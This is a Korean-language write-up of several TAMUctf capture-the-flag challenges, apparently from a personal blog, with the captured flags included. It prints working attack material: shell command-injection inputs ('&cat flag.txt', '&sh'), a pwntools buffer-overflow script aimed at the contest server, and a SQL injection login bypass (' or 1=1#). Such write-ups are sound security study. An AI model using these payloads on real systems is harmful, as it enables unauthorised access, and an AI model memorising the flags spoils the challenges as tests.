![](img/Rank.png)

귀찮아서 놀았다는 점 읍읍..
(아 물론 제대로 아는건지 모르는건지 몰라요)

# Pwn
## Pwn4 (134P)
```
nc pwn.tamuctf.com 4324

Difficulty: medium
```

![](img/Pwn4.png)
이 문제는 ```ls %s``` 로 해서 값을 받기에, 리눅스는 ```&```할 경우 추가적인 명령어를 입력을 받을 수 있다.
그것을 이용해서, ```&cat flag.txt``` 를 할 경우 정상적인 플래그를 가져올 수 있다.

플래그는 ```gigem{5y573m_0v3rfl0w}``` 입니다.

## Pwn1 (134P)
```
nc pwn.tamuctf.com 4321

Difficulty: easy
```

![](img/Pwn1.png)

분석한 결과(?) 위에 네모난 박스를 참고하고, HEX ebp-3Bh - ebp-10h (?) 할 경우 DEC 43 값이 나왔다.

![](img/Pwn1_1.png)

43 바이트 만큼, 텍스트를 넣어주고, 그 다음 ``0xDEA110C8`` 를 받을 경우, ``print_flag()`` 를 호출하는 방식으로 보인다.
그리 해서 아래 소스대로 실행했더니,

```py
from pwn import *

r = remote("pwn.tamuctf.com", 4321)

print(r.recv())
r.sendline("Sir Lancelot of Camelot")
print(r.recvline())
r.sendline("To seek the Holy Grail.")
print(r.recvline())
r.sendline(str("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") + p32(0xDEA110C8))
print(r.recv(9999999999999))
```

플래그는 ```gigem{34sy_CC428ECD75A0D392}``` 입니다.

## Pwn5 (390P)
```
nc pwn.tamuctf.com 4325

Difficulty: medium
```

![](img/Pwn5.JPG)

6바이트까지 최대 받는 것으로 보인다. 하지만 ```ls %s``` 이렇게 값을 받을 경우, ```ls ``` 공백까지해서 3바이트를 차지하고 3바이트가 최대다.
이것은 간단하게 해결할 수 있다.

![](img/Pwn5_1.JPG)

```&sh```하고, ```cat flag.txt```할 경우 완벽하게 (?) 플래그를 가져올 수 있다!

플래그는 ```gigem{r37urn_0r13n73d_pr4c71c3}``` 입니다.

# Network/Pentest

## Stop and Listen (340P)

```
Sometimes you just need to stop and listen.

This challenge is an introduction to our network exploit challenges, which are hosted over OpenVPN.

Instructions:

Install OpenVPN. Make sure to install the TAP driver.
Debian (Ubuntu/Kali) linux CLI: apt install openvpn
Windows GUI installer
Obtain your OpenVPN configuration in the challenge modal.
You will obtain a separate config for each challenge containing connection info and certificates for authentication.
Launch OpenVPN:
CLI: sudo openvpn --config ${challenge}.ovpn
Windows GUI: Place the config file in %HOMEPATH%\OpenVPN\config and right-click the VPN icon on the status bar, then select the config for this challenge
The virtual tap0 interface will be assigned the IP address 172.30.0.14/28 by default. If multiple team members connect you will need to choose a unique IP for both.

The standard subnet is 172.30.0.0/28, so give that a scan ;)

If you have any issues, please let me (nategraf) know in the Discord chat

Some tools to get started:

Wireshark
tcpdump
nmap
ettercap
bettercap
```

![](img/Stop_and_Listen_1.JPG)

이 문제는 멈추고 그리고 듣을 수 있다면, 풀 수 있다. ```sudo openvpn listen.ovpn```로 우선 vpn을 접속을 해줘야된다.

![](img/Stop_and_Listen_2.JPG)

그리고 우리는 ```Wireshark(와이어샤크)```로 패킷이 지나가는 것을 구경할 것이다. 그러기 위해 ```sudo wireshark```해서 ```관리자 권한```으로 ```Wireshark(와이어샤크)```를 실행시켜준다.

![](img/Stop_and_Listen_3.JPG)

```tap0``` 대상으로 패킷 지나가는 것을 구경해야 된다.(ovpn) * 환경마다 다를 수 있습니다.
그리해서 몰래 훔쳐보기 위해서 좀 기달린 후(안나오면 나올때까지 다음다음 패킷으로) ```Follow -> UDP Stream (Ctrl + Shift + Alt + U)```
정상 적인 플래그가 보일 것이다.

플래그는 ```gigem{f0rty_tw0_c9d950b61ea83}``` 입니다.

# Reversing

## Cheesy (100P)
```
Where will you find the flag?
```

![](img/Cheesy.jpg)

```Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ==```가 보이니, base64로 decode 해줬다.

플래그 ```gigem{3a5y_R3v3r51N6!}```가 나왔다.

## Snakes over cheese (100P)
```
What kind of file is this?
```

한 파일이 주어졌다. 하지만 이 문제를 풀기 위해서는, 디컴파일이 필요로 한다. ```https://python-decompiler.com/``` 이 사이트를 활용해서, 디컴파일을 할 수 있다.

```py
# Embedded file name: reversing2.py
# Compiled at: 2018-10-07 19:28:58
from datetime import datetime
Fqaa = [102, 108, 97, 103, 123, 100, 101, 99, 111, 109, 112, 105, 108, 101, 125]
XidT = [83, 117, 112, 101, 114, 83, 101, 99, 114, 101, 116, 75, 101, 121]

def main():
    print 'Clock.exe'
    input = raw_input('>: ').strip()
    kUIl = ''
    for i in XidT:
        kUIl += chr(i)

    if input == kUIl:
        alYe = ''
        for i in Fqaa:
            alYe += chr(i)

        print alYe
    else:
        print datetime.now()


if __name__ == '__main__':
    main()
```

이렇게 해서 소스가 정상적으로 가져와졌다. 하지만 이것으로만 풀 수 없다.

```py
Fqaa = [102, 108, 97, 103, 123, 100, 101, 99, 111, 109, 112, 105, 108, 101, 125]
XidT = [83, 117, 112, 101, 114, 83, 101, 99, 114, 101, 116, 75, 101, 121]

def main():
  kUIl = ''

  for i in XidT:
    kUIl += chr(i)

  alYe = ''
  for i in Fqaa:
     alYe += chr(i)
  print alYe

if __name__ == '__main__':
    main()
```

위와 같이 풀고, 실행 시켜준다면? 플래그가 나온다!

플래그는 ```flag{decompile}``` 입니다.

# Web
## Not Another SQLi Challenge (100P)
```
http://web1.tamuctf.com

Difficulty: easy
```

```NetID: admin``` 
admin에다가 정상적인 사용자명을 입력해주고. 

```Password: ' or 1=1#```
비밀번호에는 SQL Injection으로 로그인 결과값을 참(True)로 만들어준다.

플래그는 ```gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}``` 입니다.

# Misc

## Howdy!(1P)
```
Welcome to TAMUctf!
This year most of the challenges will be dynamically scored meaning the point value will adjust for everyone, including those have already solved the challenge, based on the number of solves.

The secure coding challenges will appear when you have solved their corresponding challenges.

If you have any questions or issues feel free to contact the devs on the discord.

Good luck and have fun!

The flag is: gigem{H0wdy!}

Difficulty: easy
```

플래그는 ```gigem{H0wdy!}`` 입니다.